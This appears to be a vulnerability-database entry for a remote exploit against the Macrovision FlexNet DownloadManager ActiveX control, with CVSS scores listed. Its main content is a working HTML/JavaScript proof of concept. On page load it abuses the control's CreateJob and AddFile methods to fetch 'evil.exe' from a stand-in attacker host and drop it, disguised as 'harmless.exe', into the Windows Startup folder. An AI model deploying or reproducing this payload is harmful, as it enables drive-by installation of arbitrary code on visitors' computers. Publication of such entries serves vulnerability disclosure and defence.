Macrovision FlexNet DownloadManager Insecure Methods Exploit

Credit: e.b.
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- Macrovision FlexNet DownloadManager Insecure Methods Exploit Implemented Categories: Category: Safe for Scripting Written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version --> <html> <head> <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title> <script language="JavaScript" defer> function Check() { var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}"); mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe"); mJob.SetPriority(0); mJob.SetNotifyFlags(2); mJob.ScheduleInterval = 2; obj.RunScheduledJobs(); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0"> Unable to create object </object> </body> </html>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top